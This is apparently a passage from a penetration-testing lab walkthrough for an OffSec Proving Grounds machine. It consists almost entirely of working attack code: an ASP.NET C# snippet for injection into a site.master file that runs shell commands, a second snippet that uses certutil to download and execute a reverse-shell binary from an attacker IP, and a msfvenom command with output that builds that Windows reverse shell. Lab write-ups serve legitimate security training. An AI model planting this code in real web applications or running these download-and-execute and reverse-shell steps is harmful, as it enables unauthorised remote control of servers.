Embedded C# Payload
<%
string stdout = "";
string cmd = "whoami";
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
procStartInfo.RedirectStandardOutput = true;
procStartInfo.UseShellExecute = false;
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
stdout = p.StandardOutput.ReadToEnd();
Response.Write(stdout);
%>A simple C# payload to embedded into the site.master file to check code execution
Reverse Shell
<%
string stdout = "";
ArrayList commands = new ArrayList();
commands.Add("certutil.exe -urlcache -split -f \"http://192.168.45.221:445/shell.exe\" \"C:\\inetpub\\wwwroot\\shell.exe\"");
commands.Add("\"C:\\inetpub\\wwwroot\\shell.exe\"");
foreach (string cmd in commands) {
System.Threading.Thread.Sleep(3000);
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
procStartInfo.RedirectStandardOutput = true;
procStartInfo.UseShellExecute = false;
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
stdout = p.StandardOutput.ReadToEnd();
Response.Write(stdout);
}
%>Updated payload to download and execute the reverse shell executable
msfvenom
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.221 LPORT=450 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exemsfvenom generated a reverse shell executable